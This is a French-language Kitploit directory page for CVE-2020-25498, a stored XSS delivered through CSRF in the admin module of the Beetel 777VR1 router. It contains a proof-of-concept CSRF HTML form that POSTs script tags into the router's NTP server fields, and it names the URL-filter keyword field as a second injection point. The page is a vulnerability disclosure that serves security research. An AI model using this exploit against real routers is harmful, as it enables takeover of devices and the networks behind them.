Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-25498 — XSS stocké via CSRF dans le routeur Beetel 777VR1 | Kitploit
Outils/GitHubGitHub/the-girl-who-lived/cve-2020-25498
Outils de PhishingAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

XSS stocké via CSRF dans le routeur Beetel 777VR1

Voir le dépôt
33il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-25498 : XSS stocké via CSRF dans le routeur Beetel 777VR1

Description de la vulnérabilité

Il a été identifié que le point de terminaison vulnérable ne dispose pas de validation d'entrée côté serveur et manque de filtrage côté client pour toute injection de script malveillant. Un attaquant peut utiliser cette vulnérabilité pour injecter un script malveillant dans le point de terminaison, et le script est activé à chaque fois qu'un utilisateur ouvre le point de terminaison vulnérable. L'attaquant peut envoyer une URL malveillante avec une charge utile de requête POST pour exécuter un XSS dans le module admin via CSRF afin de prendre le contrôle de l'appareil et, finalement, de prendre le contrôle du réseau.

Chercheuse : Sayli Ambure (https://twitter.com/sayli_ambure)

Lien CVE MITRE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

Exploit de preuve de concept :

Code HTML CSRF :

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. Nom du serveur NTP dans le module de configuration de l'heure système

Paramètre : nom du serveur

Vidéo de preuve de concept :

2. Point de terminaison du filtre d'URL dans le module pare-feu

Paramètre : mot-clé

Vidéo de preuve de concept :

Télécharger l’outil